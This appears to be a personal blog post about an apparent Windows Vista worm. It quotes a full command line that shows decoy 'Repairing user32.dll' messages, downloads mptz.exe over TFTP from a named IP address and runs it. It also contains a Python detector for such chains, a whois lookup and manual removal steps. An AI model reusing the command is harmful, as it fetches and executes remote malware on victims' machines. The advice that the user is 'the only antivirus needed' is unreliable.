new virus ???

Good morning,

today I was working at my computer when unexpectedly the friendly Windows Vista Search System (Search Utility) popped up… looking for…??????????????

%comspec% /c echo Repairing user32.dll & echo Please wait… & tftp -i 76.203.188.177 GET mptz.exe & start mptz&

well…I admit I love Vista….it’s so secure !!!!!!!!!!!!!
what the hell is happening ???????
Is that Vista Firewall working ???????????? or not????
And the Updates ???? why am I installing each one if they’re useless ?????????

I’ve probably received a new connection from an unknown IP address… scanning… thousands of addresses…
and trying to spread itself… over MY network… using a Vista bug… but what is happening NOW ?

The environment variable %comspec% given at the Run menu simply starts the default command shell (cmd.exe)…

Then this shell uses echo to show “Repairing user32.dll” and “Please wait…”; after this… the system connects via TFTP (the tftp client, with -i for binary transfer) to 76.203.188.177, downloads mptz.exe with a GET command and runs it with the start command…
and the virus…spreads again….
Unfortunately….the good Process Explorer helped me…KILLING the task……………….
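
The command chain described above can be checked for in process or command-line logs. This is an added example, not part of the original post: it splits a cmd /c chain on "&", finds a tftp GET and tells whether a later start runs the downloaded file. The function names and the second and third sample lines are constructed for illustration.

```python
import re

# First sample is the command line from the post; the other two are constructed.
SAMPLES = [
    "%comspec% /c echo Repairing user32.dll & echo Please wait... & "
    "tftp -i 76.203.188.177 GET mptz.exe & start mptz&",
    "cmd.exe /c echo Backup finished & dir C:\\Temp",
    "cmd /c tftp -i 192.0.2.10 GET fw.bin",
]

# cmd.exe (or %comspec%) invoked with /c, followed by the chained commands.
SHELL = re.compile(r'^\s*"?(?:%comspec%|(?:\S*\\)?cmd(?:\.exe)?)"?\s+/c\s+(.*)$', re.I)
# Windows tftp client: tftp [-i] host GET source
TFTP = re.compile(r"^tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
START = re.compile(r"^start\s+(\S+)", re.I)


def stem(name):
    """Lower-cased file name without directory or executable suffix."""
    base = re.split(r"[\\/]", name)[-1].lower()
    return re.sub(r"\.(exe|com|bat|cmd|scr)$", "", base)


def analyze(cmdline):
    """Walk a 'cmd /c a & b & c' chain; return None if it is not one."""
    m = SHELL.match(cmdline)
    if not m:
        return None
    # Assumption: no '&' inside quoted arguments, so a plain split is enough.
    steps = [s.strip() for s in m.group(1).split("&") if s.strip()]
    found = {"host": None, "file": None, "executed": False, "decoy": []}
    for step in steps:
        t, s = TFTP.match(step), START.match(step)
        if t:
            found["host"], found["file"] = t.group(1), t.group(2)
        elif s and found["file"] and stem(s.group(1)) == stem(found["file"]):
            found["executed"] = True  # 'start mptz' runs the fetched mptz.exe
        elif step.lower().startswith("echo ") and not found["file"]:
            found["decoy"].append(step[5:])  # text shown before the download
    return found


def verdict(cmdline):
    f = analyze(cmdline)
    if not f or not f["file"]:
        return "no-download"
    return "download-and-execute" if f["executed"] else "download-only"


if __name__ == "__main__":
    for line in SAMPLES:
        print(verdict(line), "<-", line)
```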

Searching Google for mptz.exe… returns no results… so I think it is a new virus… that started in these last days…

But who is 76.203.188.177 ???
At this whois service I got:

Registry Whois

OrgName:    AT&T Internet Services
OrgID:      SIS-80
Address:    2701 N. Central Expwy # 2205.14
City:       Richardson
StateProv:  TX
PostalCode: 75080
Country:    US

NetRange:   76.192.0.0 – 76.255.255.255
CIDR:       76.192.0.0/10
NetName:    SBCIS-SBIS-6BLK
NetHandle:  NET-76-192-0-0-1
Parent:     NET-76-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.SWBELL.NET
NameServer: NS2.SWBELL.NET
Comment:    Contact  for general IP
Comment:    Administration support.
RegDate:    2006-09-15
Updated:    2007-05-25

 

So ???? The AT&T System is trying to hack me ?????????? 😀

nooo……

anyway;

Solution: to eliminate the virus,
1_ KILL THE TASK named mptz.exe,

2_ then “jump” into your System32 dir

3_ and delete : mptz.exe, gebxwvv.dll and awtqp.dll

YOU are the only antivirus needed for your system

Hope this…was Useful…

See you….